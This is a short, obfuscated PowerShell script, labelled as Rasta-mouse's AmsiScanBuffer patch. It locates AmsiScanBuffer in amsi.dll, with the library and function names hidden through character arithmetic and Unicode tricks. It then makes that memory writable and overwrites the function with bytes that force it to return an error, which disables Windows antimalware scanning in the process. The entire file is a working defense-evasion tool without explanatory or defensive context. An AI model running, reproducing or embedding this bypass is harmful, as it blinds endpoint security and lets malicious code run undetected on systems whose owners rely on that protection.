#Rasta-mouses Amsi-Scan-Buffer patch \n
$fkwvn = @"
using System;
using System.Runtime.InteropServices;
public class fkwvn {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr zsdqmq, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $fkwvn

$afnupol = [fkwvn]::LoadLibrary("$([cHAR]([bYTe]0x61)+[cHar](109)+[ChaR]([BYTe]0x73)+[chaR]([ByTE]0x69)+[ChAR]([ByTE]0x2e)+[CHaR](100+77-77)+[ChAR](108)+[cHaR](108+25-25))")
$iqrelr = [fkwvn]::GetProcAddress($afnupol, "$(('ÄmsìScánB'+'uffer').NorMaLIZe([Char]([bYTe]0x46)+[cHAr]([ByTe]0x6f)+[ChaR]([bYtE]0x72)+[ChAr](109)+[ChAR]([byTE]0x44)) -replace [CHar]([BYTe]0x5c)+[chaR](14+98)+[chAr](95+28)+[ChAr](62+15)+[CHar]([bytE]0x6e)+[chAr](125+33-33))")
$p = 0
[fkwvn]::VirtualProtect($iqrelr, [uint32]5, 0x40, [ref]$p)
$mkfv = "0xB8"
$iiry = "0x57"
$vkrl = "0x00"
$zdgp = "0x07"
$nyxh = "0x80"
$dfst = "0xC3"
$xsbar = [Byte[]] ($mkfv,$iiry,$vkrl,$zdgp,+$nyxh,+$dfst)
[System.Runtime.InteropServices.Marshal]::Copy($xsbar, 0, $iqrelr, 6)
